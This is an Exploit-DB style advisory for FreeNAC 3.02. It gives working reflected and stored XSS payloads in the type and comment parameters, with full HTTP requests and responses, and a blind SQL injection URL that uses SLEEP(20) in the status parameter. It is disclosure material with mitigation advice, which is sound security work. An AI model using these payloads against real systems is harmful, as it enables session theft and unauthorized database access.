FreeNAC version 3.02 SQL Injection and XSS Vulnerabilities

vendor:

FreeNAC

by:

Blake

N/A

CVSS

MEDIUM

SQL Injection and XSS

CWE

Product Name: FreeNAC

Affected Version From: 03.02

Affected Version To: 03.02

Patch Exists: YES

Related CWE:

CPE: a:freenac_project:freenac:3.02

Metasploit:

Other Scripts:

Platforms Tested: Ubuntu 8.04

2012

FreeNAC version 3.02 SQL Injection and XSS Vulnerabilities

Multiple parameters in FreeNAC version 3.02 are vulnerable to reflective cross-site scripting. The affected parameters are comment, mac, graphtype, type, and name. An attacker can inject malicious scripts into these parameters, which can be executed in the user's browser. This can lead to various attacks such as stealing sensitive information, session hijacking, or defacing the website.

Mitigation:

To mitigate the XSS vulnerability, it is recommended to implement proper input validation and output encoding. Additionally, web application firewalls can be used to detect and block malicious script injection attempts. For the SQL Injection vulnerability, it is recommended to use parameterized queries or prepared statements to prevent unauthorized access to the database.

Source

Exploit-DB raw data:

FreeNAC version 3.02 SQL Injection and XSS Vulnerabilties
Date: May 19, 2012
Author: Blake
Software Link: http://sourceforge.net/project/showfiles.php?group_id=170004
Version: 3.02
Tested on: Ubuntu 8.04 (freenac version 3.02 vmware appliance)

FreeNAC FreeNAC provides Virtual LAN assignment, LAN access control (for all kinds of network devices such as Servers, Workstations, Printers, IP-Phones ..), live network end-device discovery.Both 802.1x and Cisco's VMPS port security modes are supported. VLAN, switch port management and documentation of Patch cabling is also included.


==========================================================================================================================================
Reflective Cross-Site Scripting:
Multiple parameters are vulnerable to reflective cross-site scripting.

Affected Parameters:
comment
mac 
graphtype
type 
name


Example Request:
GET /stats.php?graphtype=bar&type=vlan13<script>alert(1)</script> HTTP/1.1
Host: 192.168.1.118
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Proxy-Connection: keep-alive
Referer: http://192.168.1.118/stats.php?graphtype=bar&type=switch
Cookie: freenac=92bcf3d911d94e33106c2e79745e8e8e

Example Response:
HTTP/1.1 200 OK
Date: Sat, 19 May 2012 17:42:41 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 5676
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" 
     "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
	<html xmlns="http://www.w3.org/1999/xhtml">
	<head>
	  <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
	  <title>FreeNAC :: Swisscom ::</title>
	  <link href="bw.css" rel="stylesheet" type="text/css" />
	</head>
<a href='./index.html' title='Main Menu'><img src='./images/logo_small.png' border='0' /></a>


..........snip......................

<img src="statgraph.php?stattype=vlan13<script>alert(1)</script>&order=DESC&graphtype=bar"><br>
<br>  <p class='UpdateMsg'>Database error</p>
  <p>Please go <a HREF='javascript:javascript:history.go(-1)'>back to the previous screen</a>, or the 
  <a href='./index.php' >Main Menu</a> and start again, or try again later.  </p>




==========================================================================================================================================
Stored Cross-Site Scripting:
The comment parameter is vulnerable to stored cross-site scripting.

Example Request:
<changed from a POST to a GET>
http://192.168.1.118/deviceadd.php?name=test&mac=0001.0001.0001&status=1&vlan=6&username=2&office=1&comment="><script>alert(2)</script>&action=Update&action_idx=1

Example Response:
HTTP/1.1 200 OK
Date: Sat, 19 May 2012 17:53:38 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6945
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" 
     "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
	<html xmlns="http://www.w3.org/1999/xhtml">
	<head>
	  <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
	  <title>FreeNAC :: Swisscom ::</title>
	  <link href="bw.css" rel="stylesheet" type="text/css" />
	</head>
<a href='./index.html' title='Main Menu'><img src='./images/logo_small.png' border='0' /></a>

.............snip.................

</td></tr>
         <tr><td>Switch:</td>
           <td>, port= , location=  </td>
           <td><input type="submit" name="action" class="bluebox" value="Restart Port" /> </td>
         </tr> <tr><td>Comment:</td><td>
<input name="comment" type="text" size=40 value=""><script>alert(2)</script>"/>
</td><td>Last IP:NONE<br></td>
<tr><td> </td><td></td></tr>
          <tr><td> </td><td>
          <input type="submit" name="action" class="bluebox" value="Update" /> 
          <input type="submit" name="action" class="bluebox" value="Delete" 
            onClick="javascript:return confirm('Really DELETE this end-device record?')"
            />
          </td></tr>'<tr><td> </td><td></td></tr>
<tr><td> </td><td></td></tr>
</table> <table id='t3-2' width='760' border='0' class='text13'><tr><td> </td><td></td></tr>
<tr><td colspan=3 bgcolor="#DEDEDE"><b>Administrative information</b><tr><td>Inventory:<td>
<tr><td>Classification:


............snip....................





==========================================================================================================================================
SQL Injection:

The status parameter is vulnerable to blind SQL Injection.
Injecting a time-delay of 20 seconds:

http://192.168.1.118/deviceadd.php?name=test&mac=0001.0001.0001&status=1+AND+SLEEP(20)&vlan=6&username=2&office=1&comment=&action=Update&action_idx=1